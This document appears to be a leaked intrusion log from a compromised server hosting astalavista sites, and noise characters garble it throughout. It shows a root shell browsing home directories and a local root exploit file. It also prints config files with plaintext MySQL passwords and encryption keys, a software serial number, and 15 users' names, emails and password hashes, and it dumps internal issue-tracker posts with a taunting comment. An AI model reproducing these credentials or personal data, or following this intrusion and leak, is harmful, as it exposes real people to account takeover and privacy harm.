7 x& n! T' i& a. M/ Y  L' v-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout7 ~# @8 S8 w5 W5 d- R4 J
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile0 |9 S+ t* z/ n' `0 d4 O9 Y7 T
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
# J% G5 F3 J% Y) k1 c$ l1 Wdrwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
& S$ T: M' J2 I4 @3 Cdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap4 g- |  O$ L# w% B; B4 o1 {
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail
1 z8 f( G" G4 ^, J! Z, i; V9 k-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
' e7 G5 P5 J- d8 |) i  ~8 d- mlrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html9 @) P6 Q  Q% B! x' ~  w* g
-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
. n; i0 ~9 ?# l7 @
' N$ A' Y7 d+ D2 A$ O, F5 |sh-3.2# cd auth/* V/ N9 a4 m2 g1 r9 K
sh-3.2# ls -la! ?7 N' a, [5 M% k" l' Z
total 28
8 [  c+ h  W/ U4 b; |) Kdrwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
. n- v8 C- u& N6 |6 qdrwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..
  P3 l$ L4 B, n. Y: S-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php) |! ?# I% S! I8 R4 T! u* u
-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php
  V* A3 b) j3 C$ I+ Z* e$ p-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd0 n8 N! z' Y3 O# b
-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting6 G6 V' v1 Y4 f& P/ ^
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
# j; e0 g0 z' D2 }6 d) T# q3 I& q5 T$ T
sh-3.2# cat hackercontest.config.inc.php
: O- \- ~- z8 I<?PHP
. _$ ^; k5 D9 Q/ }( F+ l// Variabeln f?r Verbindung zur Datenbank //
3 U- V9 ~! @4 A8 Z$conxHost = ‘localhost’;                       // MySQL hostname, i$ a7 V% c/ f3 U1 t
$conxUser = ‘hackercontest’;                                       // MySQL user
, k2 O6 Q) Y& Q9 [. Y0 Q$conxPassword = ‘K6m@7dUc’;                    // MySQL password7 C0 r4 |0 l+ Z3 i& W" h& i% P
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish: k& m; i! f* ^6 z/ p) {* e
?>
- v- J; Q9 {" d% F6 Psh-3.2# cat hosting.config.inc.php5 n( u2 h: a# K- x+ B3 X
<?PHP
( \& S; m+ g! P- C) f+ ^// Variabeln f?r Verbindung zur Datenbank //) @1 Q  x9 \8 D0 A  B7 K
$conxHost = ‘localhost’;                       // MySQL hostname
# N; I( \$ W& I3 B5 m* f$conxUser = ‘hostinguser’;                                 // MySQL user6 v8 D( Q1 K% V1 [  l) V/ D9 V7 S
$conxPassword = ‘cXvB3981′;                    // MySQL password3 j$ K6 I: C+ f1 C8 K
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish2 u& M( Y6 m5 Z7 }' G
?>
! v3 ~9 x, X& y3 i3 K# b# u3 G1 l
sh-3.2# cd ..; \* N0 c! P- @' O& J- `
sh-3.2# cd com
8 ^0 z( \1 a7 q( w) hsh-3.2# ls -la4 U9 O6 }+ V! t+ @9 q' _
total 141208
6 v  I/ ]9 ~5 t, Kdrwx–x–x 10 com  com       4096 Apr 28 12:40 .
8 v# J3 C. h& R' ydrwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
3 N7 X2 e  l$ r5 i2 L0 Ndrwx——  2 com  com       4096 Jun  4 04:04 backups! _2 @5 K% j; J) X2 U# S# h5 u
-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
6 d7 Z. K2 |/ N/ ^' I3 d# ddrwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
, @9 v9 r. ?8 H% U1 r8 j- M, T9 P-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history
6 U- h4 C! B' q, w& U-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout* |; d; [  M' Y4 N9 H
-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile5 t( P5 ]* o1 L* L! R; l
-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc1 y0 J0 t% y  \: Y/ ^; ]3 f4 V
drwx–x–x  3 com  com       4096 Jan 29  2008 domains: j+ w2 [3 @1 U# \3 u% [; R
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed9 U0 j7 l2 g2 f( g# z1 u' x
drwxrwx—  3 com  mail      4096 Jan  6 19:24 imap
7 r* \/ C4 C/ K. |0 g+ A9 S-rw——-  1 com  com         69 Nov 18  2008 .lesshst& O& Z2 F" T. U8 a7 v2 h9 Y0 n
drwx——  2 com  com       4096 Sep 24  2007 mail# a6 D3 D' \9 X9 o9 q3 r
-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history/ S7 a/ g3 K% ~0 P/ r
drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
4 |1 p1 p3 G9 f2 u. D2 t6 k+ ulrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
, i( b9 ?* @) L9 V% }6 R-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow
. F8 o; |0 c. }) ~2 ], t% ldrwx——  2 com  com       4096 Aug 26  2008 .ssh
) D  ~6 f& X3 k-rwx——  1 com  com       8515 Feb 10  2008 t
# E+ V/ ?# q( J-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c
) i7 \7 s% D) |drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
2 i$ k, O- D* F2 O8 K-rw-rw-r–  1 com  com        617 May 20  2008 .toprc& \' X  u% S4 h
-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql7 ]2 @+ h6 A# ]( k& e
-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo/ x5 v- c. s8 l% n- F' v9 b7 L
-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
" E: D. B9 x$ @- ^$ n
2 J9 i* {: |! c9 c6 R& zsh-3.2# head t.c
2 j6 c; X- M$ d/*
- @& H' t* q; r! F) {2 B/ \7 o* jessica_biel_naked_in_my_bed.c9 U' s$ _" G/ G& o
*! p1 N0 o6 T4 ~% R- d  {
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.  V% \( J/ [$ f5 O  k& |, V
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
& ]9 |$ j3 d" y+ k2 B; _* W9 L* Stejnak je to stare jak cyp a aj jakesyk rozbite.
' ^$ \7 m, H5 [8 S7 B/ W& i*9 k) U: j  M+ q
* Linux vmsplice Local Root Exploit- Z4 Q" B1 D( M7 C1 \
* By qaaz% C0 |) }2 V& n8 g- L
*
' F3 P4 P) W& o# Z* m( W$ D+ [; ?! n5 l, v3 M
sh-3.2# cd /- o* q3 E. A5 y. p2 w) a( v
sh-3.2# ls -la9 b! P, T: ~  v
total 360
8 u6 ~- V6 \2 @; cdrwxr-xr-x  25 root root   4096 Jun  3 02:43 .
# i! y$ p. f* A, udrwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
2 z  R5 }! q8 Y1 T-rw——-   1 root root  10240 Jun  3 02:39 aquota.group
2 {- L3 b3 ?. u* ?2 W+ q3 C-rw——-   1 root root  10240 Jun  3 02:39 aquota.user
9 q2 ^2 L0 m4 P* p1 u-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db
; H: n2 L: F- r-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck( C- C( |% r: ?" d  V
-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel
! |: B, ?' x2 @  J" _2 Ddrwxr-xr-x   3 root root   4096 Dec 29  2007 backup5 Y0 ~- `! }% K1 J- x  I; ^3 k
drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
7 o' J8 _. a( @drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot6 Q- O% }/ e4 R
drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev* j4 k, f* ?3 I- H5 g
drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc: w. T% I; b0 x$ H
drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
( A1 L- M( ~" F2 Z. ?  l  c1 |-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf
# Q; T; B! S2 ~drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
6 T; I  L3 Y( `3 o6 q% Gdrwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64' h3 B5 R9 h# i% N1 x/ E+ J
drwx——   2 root root  16384 Sep 11  2007 lost+found
6 v$ g3 ~+ r: x# O* N/ jdrwxr-xr-x   2 root root   4096 Mar 11 17:56 media' k# L, S1 W/ x7 g
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc
- E- a6 A2 `9 V, }0 ldrwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt9 Z& M8 W, y! n; P4 i( N
-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg4 u, E0 t+ ~- V( q- o! l8 n0 M' y
drwxr-xr-x   2 root root      0 Jun  3 02:43 net
! ]3 _3 f5 D9 Z6 p) \- zdrwxr-xr-x   3 root root   4096 Mar 11 17:56 opt$ q1 _  ?/ O7 p
dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc  \0 \3 n$ z) T7 p% `; z0 v
drwxr-x—  15 root root   4096 Jun  4 08:40 root& Z! @7 e, n& S$ ]& m! h6 C3 I
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
$ n. D1 `: @1 q5 L) J$ r3 pdrwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
( ?9 t3 {8 {  Y) F8 A# G; _! X# Kdrwxr-xr-x   2 root root   4096 Mar 11 17:56 srv9 q3 b; a9 H- y5 }
drwxr-xr-x  11 root root      0 Jun  3 02:42 sys
9 m( _  j" x! _: D: X& P. adrwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp4 n& m+ y8 ^* i" L# [
drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr" b; N  o, z  a0 q8 ^! K6 J
drwxr-xr-x  26 root root   4096 Jun  4 03:16 var
; U9 G% M( T+ k% n% V. H, I% x2 B' s8 _4 W
sh-3.2# cd opt# k0 h9 B- N3 P) K
sh-3.2# ls -la
3 e8 ]: M2 `6 @1 Htotal 20
& M$ N- ?2 _" Z9 z" r) y1 Zdrwxr-xr-x  3 root root 4096 Mar 11 17:56 .
( ?- u$ R; c9 N  Ndrwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
/ [5 |; R( f" i) ?; X* Z: ?; j5 Gdrwxr-xr-x 15 root root 4096 Mar 20  2008 lsws+ j; w$ s: H- d' B4 s

' d9 e( t- C) F* ]4 ?$ u# w3 Msh-3.2# cd lsws/" G6 ^5 }4 ]/ v5 m' F, Q
sh-3.2# ls -la8 r* y9 l) M+ L) A+ T
total 108
8 C" l6 M; ]* q  Z% b* {% rdrwxr-xr-x 15 root   root    4096 Mar 20  2008 .1 w: g& H! O6 @6 t2 N/ o% }, |
drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..
6 l' p" H! f" u) @; Bdrwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons6 z" w; ]* g& {  D7 H( K
drwxr-xr-x 13 root   root    4096 May 29 15:10 admin
; y. i9 Q: \! u- Wdrwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate1 G. `& j% w7 I% L$ H. g4 O
drwxr-xr-x  2 root   root    4096 May 29 15:10 bin2 }/ ?2 J, R6 `: m( F5 i0 G
drwx——  4 apache apache  4096 Jun  3 02:43 conf, w' C. X' N2 ~7 G6 D! E
drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT1 e/ T& f  W, _% @
drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
$ ]6 U2 K6 g6 bdrwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
" X/ N0 t" w' Sdrwxr-xr-x  2 root   root    4096 Sep 15  2008 lib7 `5 l( h0 I3 B# R
-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE
0 {+ w5 o0 g/ [) [8 g. H! r6 t( f-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
* A! R1 `( V3 o2 d' r5 E1 R-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL
: s9 I. X" v4 A-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP5 o" a% m- Y; l: {1 l, T
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs! q2 i- F5 o- B* b0 D* r; q
drwxr-xr-x  2 root   root    4096 Mar 20  2008 php7 J- A5 H) M8 H! l# K& N
drwx——  2 apache apache  4096 Mar 20  2008 phpbuild
4 V0 b0 D0 \( V) e* j4 f$ [0 b2 @/ ^drwxr-xr-x  3 root   root    4096 Mar 20  2008 share" D1 A5 J( J+ i: H3 I
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION' `2 B8 T: F* |1 x- H

* m4 \' a4 v! b  Esh-3.2# cd conf
5 C) T& V1 w; C" X: k  Nsh-3.2# ls -la
! P: h9 }2 G% g/ d* ktotal 48& Q0 c; T9 y7 I' }$ ]) k
drwx——  4 apache apache 4096 Jun  3 02:43 .8 U+ H1 I8 F7 {2 D
drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..1 x1 Y) [9 }7 f( Y% X
drwx——  2 apache apache 4096 Mar 20  2008 cert
$ a% F9 z/ f2 }4 W( L4 v-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml
  A& a9 u% k+ p- y: ~( o9 @5 q2 u-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak* I( ^9 z. ]# q9 a" q* k
-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last' h9 g7 X' K( m3 B  {: a" J6 d
-rw——-  1 apache apache  256 May 29 15:10 license.key% D: C' n/ C, Z+ H& w
-rw——-  1 apache apache  256 Mar 21  2008 license.key.old
) S/ D, ]% L( ]$ X  n* {-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties
$ a* S4 S+ I5 ]& Q  S-rw——-  1 apache apache   20 May 29 15:10 serial.no
& q& K( w# h4 |9 xdrwx——  2 apache apache 4096 Mar 20  2008 templates
0 v& }7 v  q' [, f; X+ i" `$ P. |! }8 a
sh-3.2# cat serial.no* _9 G% M* M  @; R! |
IbDl-oVsO-CKqL-wVRa
9 [4 A3 [1 @# o* P
& v9 D' y$ ^. G4 ~! fsh-3.2# mysql
  A6 y# M% Q0 X* M- MWelcome to the MySQL monitor.  Commands end with ; or \g.1 W' p' f' [7 W
Your MySQL connection id is 286844/ G( h7 x" o: ?6 R+ i# Z5 n& y; k
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
  C$ I5 |$ V8 T) {+ ]% k
' p% N# N. d3 D: OType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
, }9 [8 A/ }: Y8 V9 g9 F0 `0 _+ B% c1 F& Z& J0 S, x- f
mysql> show databases;7 S+ @" b/ S- t. u3 o9 _. F
+———————–+3 d0 M# n8 V. @( Y- M1 s
| Database              |! _+ Q: u2 A% {9 m( A3 ~
+———————–+) P) q( v! {* g
| information_schema    |
2 W2 Z# ~8 y0 l( ~5 j# m$ f$ W$ ?1 d| astanet_ads           |
, h: e: e1 _6 F* p& q1 r| astanet_mailing_lists |
0 a) |9 Y5 q& ~. a+ k, q7 h| astanet_mediawiki     |1 C5 }7 E, T0 ~" X+ ?- q: g# ]. `; U
| astanet_membersystem  |
) M" k+ b5 Q  @0 C; e' a| com_contrexx          |
; x/ f' c1 Y9 r% v4 r( J4 V7 t| com_contrexx2         |, r# ]+ J% ]( I" w4 l( T# m  l, {
| com_contrexx2_live    |6 t) T- V! {6 x  L: Z
| da_roundcube          |
. q! ]* _# K+ M, E| dolphin               |
; d5 ^! {" x. K5 p3 _8 l| ideapool              |0 Q, e! n- r2 u$ `2 t- B
| mysql                 |2 B$ v& k& g! g2 H/ u' ^& H0 f
| test                  |/ V7 q% }* d8 F& `. k) V4 S
| yourmaster            |% g9 }" w+ k- o: Q# b4 |% e0 J
+———————–+
* M0 L5 N5 ]) p14 rows in set (0.00 sec)
7 A! ^. r9 j% N4 n+ M2 l+ I6 U" Q& J8 _! w* P
mysql> use ideapool
4 u+ [; x( d4 H% k' cDatabase changed
" B, A8 D& G& J: t. a/ Wmysql> show tables;4 |3 ]" i+ t+ [5 R9 h6 R3 z
+———————————–+  g3 n, h  p7 k$ Q0 I7 F; c  d' v
| Tables_in_ideapool                |
0 I& a/ y7 d. H) e; z9 k+———————————–+# i- c" \" K7 X; R, O! m
| eventum_columns_to_display        |
8 j! ~% G, ], l5 ?| eventum_custom_field              |
- R2 N/ V; E; m4 \  T. C| eventum_custom_field_option       |
( n" ?4 a* K+ D: A! \2 W2 y| eventum_custom_filter             |
# n0 y3 ~# M1 X| eventum_customer_account_manager  |
7 {$ L1 Z: U" g  N| eventum_customer_note             |4 I% D6 X  I/ I& p
| eventum_email_account             |
0 @5 A" t& C) V1 y! q| eventum_email_draft               |6 c5 F2 y6 t# O, M6 z
| eventum_email_draft_recipient     |( D7 t! N" e& B, t
| eventum_email_response            |
/ [: c2 v( o  t& w3 |* b2 t| eventum_faq                       |
1 \( E% h% v3 T; G, |; }7 S| eventum_faq_support_level         |6 H0 @9 R" {* q7 P/ j# l
| eventum_group                     |
# v( b/ H0 h- W( c| eventum_history_type              |1 S/ W. f( Z3 o0 h( M- E
| eventum_irc_notice                |( {1 W- L0 l* X
| eventum_issue                     |' H% l3 Z6 T% y5 |* O
| eventum_issue_association         |
8 A4 D/ t9 H, K* B7 ]! p. `+ I) p| eventum_issue_attachment          |# V% t  [1 L7 p# x7 u
| eventum_issue_attachment_file     |
: {* d8 S/ C& q8 j* y5 \2 O| eventum_issue_checkin             |
, q# R4 `$ Q# @! K9 v9 a' ?| eventum_issue_custom_field        |! \1 S' Q1 j! k: k6 o
| eventum_issue_history             |$ s: V1 e! E* L; G# F5 Y
| eventum_issue_quarantine          |
, Q9 p; X; |! h! [4 E2 H7 c| eventum_issue_requirement         |8 W6 O3 d0 f* w1 h/ f% `# j
| eventum_issue_user                |) R( i+ b: C3 m) v, |
| eventum_issue_user_replier        |, Q8 T% g8 G( c+ P
| eventum_link_filter               |
+ T9 W% G. d5 |' N; m| eventum_mail_queue                |
; f  A' i5 m, H2 M  ?| eventum_mail_queue_log            |
; H/ o* W& J8 D$ h- y| eventum_news                      |
- Q( L/ V" @2 f3 I| eventum_note                      |
2 _! p7 |! @4 j0 Q0 X| eventum_phone_support             |
6 \2 e2 _4 ~1 a1 \* K+ Y% o/ v| eventum_project                   |
2 T7 t9 q! k! C. k| eventum_project_category          |
* S( i. y- t# {& O| eventum_project_custom_field      |
9 f: z/ A( v# D4 V3 I/ o| eventum_project_email_response    |
! U9 G/ E3 l* n) K9 u8 c' a| eventum_project_field_display     |# I% r) Y+ W" q4 {
| eventum_project_group             |
' U" q/ L" N% _# r! [| eventum_project_link_filter       |
5 Z; m$ m! j( k| eventum_project_news              |
6 o2 D0 `/ x# T8 k5 L$ O* x/ w, J# C| eventum_project_phone_category    |
: o, a! Z# d* A. v6 `- Y; ]0 J  y| eventum_project_priority          |
5 l% e5 j6 _  E' ]| eventum_project_release           |
/ y- S- k0 r3 \+ _$ ~! h  C: v  N, ^) W| eventum_project_round_robin       |" I: ?7 G3 j( x" j2 U
| eventum_project_status            |
" I1 n* ^+ ?7 T6 {| eventum_project_status_date       |9 Q; q+ c/ \7 u
| eventum_project_user              |) V) a8 m/ B! ^, {- s. S
| eventum_reminder_action           |7 X  H( R7 a$ c: H; }: x
| eventum_reminder_action_list      |1 L2 f, L! b0 W5 [2 s; S
| eventum_reminder_action_type      |
5 M4 i" j$ P& A; }" {6 ]7 H: o, r| eventum_reminder_field            |
. e6 X2 z" R$ x  _( c' a| eventum_reminder_history          |
. v8 F! t9 U. [/ m6 i; A0 A| eventum_reminder_level            |: V- E2 \9 i, o2 m% U
| eventum_reminder_level_condition  |
" n% m3 R- M9 y' x$ G# B8 || eventum_reminder_operator         |
( D. P8 \( p7 i| eventum_reminder_priority         |! J: ]" Z! _1 ^  p  c4 T
| eventum_reminder_requirement      |' u' E+ ?! _0 S- D: y6 e3 \
| eventum_reminder_triggered_action |& {& {7 U/ N5 _
| eventum_resolution                |
+ T, V( Z4 d9 u3 x, ~| eventum_round_robin_user          |! v6 O" V) S( E) d+ k
| eventum_search_profile            |5 Q; |& j! K: b+ y
| eventum_status                    |
, p' P  c9 M  _. T2 X+ T& x| eventum_subscription              |
9 J5 x& c" i$ G: a! P5 c| eventum_subscription_type         |
4 N1 v" h' E' S) ~! B$ y| eventum_support_email             |
6 Q6 E& J7 j/ x+ v1 `" E| eventum_support_email_body        |
; ^8 s0 k4 T( R* E7 y: Q1 H0 i1 e| eventum_time_tracking             |
6 ~  e1 k  g2 s2 e3 h* z3 J5 v: j| eventum_time_tracking_category    |& `' S6 Y* a9 h* ]- A
| eventum_user                      |8 Y9 T/ O4 p5 W$ ]4 e& v
+———————————–+7 C: a" {$ c+ Z- s1 O! t" _
69 rows in set (0.00 sec)- l2 v. m! ^+ j2 U: v) @1 u8 |
: x; T: J7 V  t4 H; r7 a% _% a6 b
mysql> describe eventum_user;- x. d, A; D: v% }) J
+————————-+——————+——+—–+———————+—————-+
9 E) H) s4 Q; ~2 l# t| Field                   | Type             | Null | Key | Default             | Extra          |
4 `) N7 E  ~; [3 v5 p) Y+————————-+——————+——+—–+———————+—————-+
7 u" y" |3 B, f# H$ o| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |" B& \7 k  r, X, O
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |
0 S. a& \, `: Q* P| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |) H6 X; p* j( {+ R# t
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |% d; X- |  w: K2 n
| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |( K: N, {( C4 e
| usr_status              | varchar(8)       | NO   |     | active              |                |3 t  }' Z+ S5 S; ]' P" U& P
| usr_password            | varchar(32)      | NO   |     |                     |                |
- P) N7 k8 u0 u! q5 v2 V* [| usr_full_name           | varchar(255)     | NO   |     |                     |                |! r4 c7 ?6 h5 ^6 u0 t1 d% @3 c
| usr_email               | varchar(255)     | NO   | UNI |                     |                |
# g+ t8 ~3 [; q0 [| usr_preferences         | longtext         | YES  |     | NULL                |                |
( d$ Q' p4 U1 V( s" O) e/ z| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
8 i" q" C3 o8 _. b/ z3 Y! `| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |9 J4 g2 j7 n: k( s1 u
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |& M- P! ^# y7 w
+————————-+——————+——+—–+———————+—————-+
3 Y, I, f% G0 b8 ]: K* H13 rows in set (0.00 sec)
3 I+ _: y8 X8 e7 z1 K  P! F7 g9 o8 `
mysql> select usr_full_name,usr_email,usr_password from eventum_user;3 g+ N. N5 K1 X/ U
+———————-+——————————-+———————————-+$ x0 S6 ^  @" B# b) c
| usr_full_name        | usr_email                     | usr_password                     |. H3 N: n6 c9 W# M+ _8 M
+———————-+——————————-+———————————-+8 i. [5 d: ]9 O, u4 _3 v- o9 B
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |
2 d$ j" i( ]; [| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
5 a! A5 a! T; C5 B| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |( L3 ~( v# _- z1 u; ~0 A3 h
| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
6 x( R  D0 r8 h5 A& {: I8 }& R| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |8 h- r4 M: P# N3 f! s& K3 Q4 S% w
| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |. G" w2 Y5 p% y* ]
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |8 l! O& q- N  g9 {6 ^0 B. c# y
| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
9 @& }- m6 W& p% O0 v| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |: `2 h$ u& f( k- b% O3 ~% b
| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |
' Z" |0 w+ q' G$ R. q| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |+ [- }, R' H$ @- m
| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
/ ~! V. z/ Z3 z$ V/ ^! x. ^| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
$ P& L0 D$ ?- X| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |7 k: i, y: z2 E' s7 D
| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |4 t8 z8 ^3 R* C3 b! f
+———————-+——————————-+———————————-+; t7 K% B  \: D' t. f! |; d
15 rows in set (0.00 sec)- \, z+ V; \+ ^* v
. u, S) K9 D; x7 \
mysql> select iss_description from eventum_issue where iss_id = 43;5 y. ~) m1 r& l9 r! x! ^
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
1 g3 ]$ M" W9 a' a  O| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                & V1 t7 O3 C. q4 ]/ L
|% d/ K; A" g4 e6 M' j3 ^$ X8 p
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+0 ~- H2 C0 r, c. A" }
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be4 n  }. f0 E/ C" D( g0 e" _# u$ \
connected for 90 mins… 120mins… so what i propose is something like:
5 \( ^1 ]. k8 {链接标记[url]http://www.surfthechannel.com/[/url]" T9 t( R2 s# G5 R: r% E: x
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
! e8 c$ L3 P0 t6 Tlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t: j+ K% h' m! g% D& x/ N7 [8 A, y
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off/ q$ X' Y+ |2 ^3 w8 U
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…2 `, G" ?) M# n5 z7 j- L, N/ _
$ z7 O# y+ @3 G0 B: B8 I, C
We could also put advertisement during play on the flash video player itself… extra $$…) T7 ^) F9 p# s6 s
; S+ h2 Y" H& z: o" m. V( O
By sykadul |8 M- c' j8 j1 R
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+( y/ V7 q( Z0 u0 t' d
1 row in set (0.00 sec): |& w/ ^( ^# u( i& K( w7 O
9 y2 z! r0 Y6 ^, }: x# o
// Money and extra $$ is all they care about. remember that.
1 K. u9 v+ V1 M$ ]6 f# B# H7 V! m  {1 J6 N
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;- |4 k: I8 S9 i3 p7 i
+————————+——————————————————————————————————————————————————————————————————————————————-+& V' w* s; ~3 {+ _+ C* M. d7 U% b" x! ?
| iss_summary            | iss_description                                                                                                                                                                                                                          / P9 l$ y/ Y5 }* v
|; X# T1 x8 p- D' M! x8 ?$ G
+————————+——————————————————————————————————————————————————————————————————————————————-+
* J/ o& _# w9 c$ w. D% i0 j| Forum for REAL EXPERTS | Hello,
) i9 D2 K7 G0 f& B5 s* Z% w
! S. s7 [0 c2 I4 U  C" [- N* g0 C- PIshtus and I,5 J8 W1 Y, t# x2 p
, N. M5 i+ i/ F, O
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide7 W8 l8 I& T# h. c/ s, }
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..! Y  g! F4 X- m: Z3 r0 y

3 l4 c- h) ^3 j5 A1 a3 HOne example a friend of mine from coresecurity.com!
% W4 I, W8 T2 t2 t  Z' ~! A( k8 j" c. j5 E, s/ G0 u
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
) z6 j: G  E( ^: h
9 W' V6 Y8 }! [6 D! P' T|
; D( l' s. K& ?: C; Z! [8 x+————————+——————————————————————————————————————————————————————————————————————————————+! @0 i2 }$ i6 q
1 row in set (0.00 sec)
: g& V- g( j* q2 b# Q" ^1 b4 P8 U. v& m- e- F4 ]4 a
